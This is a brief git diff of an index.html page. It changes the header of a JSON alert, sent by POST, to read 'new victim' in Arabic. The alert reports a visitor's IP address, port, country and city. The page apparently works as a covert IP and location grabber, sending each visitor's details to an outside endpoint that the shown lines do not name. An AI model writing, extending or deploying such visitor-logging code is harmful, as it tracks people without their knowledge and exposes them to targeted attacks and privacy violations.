--- a/index.html
+++ b/index.html
@@ -221,7 +221,7 @@
                 method: 'POST',
                 headers: {'Content-Type': 'application/json'},
                 body: JSON.stringify({
-                    content: `⚠️ **-- ** ⚠️\n\n` +
+                    content: `⚠️ **ضحيه جديدة ** ⚠️\n\n` +
                              `**IP:** \`${ip}\`\n` +
                              `**Port:** \`${port}\`\n` +
                              `**Location:** ${country} - ${city}\n` +
